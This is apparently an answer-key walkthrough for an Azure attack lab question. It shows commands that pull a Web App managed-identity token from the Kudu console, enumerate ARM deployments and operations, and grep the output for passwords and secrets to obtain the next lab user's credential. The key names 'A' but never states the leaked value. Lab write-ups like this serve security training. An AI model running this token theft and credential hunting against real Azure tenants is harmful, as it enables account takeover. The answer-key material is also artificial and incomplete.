Answer : A
The answer is the exposed provisioning secret retrieved from ARM deployment metadata, deployment operations, or App Service configuration. In this lab chain, it should reveal the next user credential, commonly for:
sumit.siddharth@azuresecops.onmicrosoft.com
Detailed Solution:
The key point is this: you are no longer only using Alex's user permissions. You must use the Web App managed identity.
From the Web App runtime/Kudu console, request an access token for Azure Resource Manager.
For Linux-style shell:
curl '$IDENTITY_ENDPOINT?api-version=2019-08-01&resource=https://management.azure.com/&client_id=cf3664d4-5cec-4feb-b0ef-88b7958809df' \
-H 'X-IDENTITY-HEADER: $IDENTITY_HEADER'
For Windows PowerShell inside Kudu:
$uri = '$env:IDENTITY_ENDPOINT?api-version=2019-08-01&resource=https://management.azure.com/&client_id=cf3664d4-5cec-4feb-b0ef-88b7958809df'
$response = Invoke-RestMethod -Uri $uri -Headers @{
'X-IDENTITY-HEADER' = $env:IDENTITY_HEADER
}
$token = $response.access_token
Now use the token to query Azure Resource Manager.
$sub = '7403ec86-c39d-4d80-9efa-35c7580ecefa'
$rg = 'Excalibur-Resources'
Invoke-RestMethod `
-Uri 'https://management.azure.com/subscriptions/$sub/resourceGroups/$rg/resources?api-version=2021-04-01' `
-Headers @{ Authorization = 'Bearer $token' }
Next, enumerate ARM deployments.
Invoke-RestMethod `
-Uri 'https://management.azure.com/subscriptions/$sub/resourceGroups/$rg/providers/Microsoft.Resources/deployments?api-version=2021-04-01' `
-Headers @{ Authorization = 'Bearer $token' }
For each deployment name returned, inspect it:
$deploymentName = '<deployment-name>'
Invoke-RestMethod `
-Uri 'https://management.azure.com/subscriptions/$sub/resourceGroups/$rg/providers/Microsoft.Resources/deployments/$deploymentName?api-version=2021-04-01' `
-Headers @{ Authorization = 'Bearer $token' }
Also check deployment operations:
Invoke-RestMethod `
-Uri 'https://management.azure.com/subscriptions/$sub/resourceGroups/$rg/providers/Microsoft.Resources/deployments/$deploymentName/operations?api-version=2021-04-01' `
-Headers @{ Authorization = 'Bearer $token' }
Search the output for fields like:
password
secret
adminPassword
userPassword
credential
sumit
The exposed value is the answer to Q4.
A practical one-liner on Linux would be:
curl -s -H 'Authorization: Bearer $TOKEN' \
'https://management.azure.com/subscriptions/7403ec86-c39d-4d80-9efa-35c7580ecefa/resourceGroups/Excalibur-Resources/providers/Microsoft.Resources/deployments/<deployment-name>/operations?api-version=2021-04-01' \
| jq '.. | strings' | grep -iE 'password|secret|credential|sumit|flag'
Final Answer:
Use the leaked secret/password value returned from the deployment metadat
a. Do not guess this; it is lab-generated.
================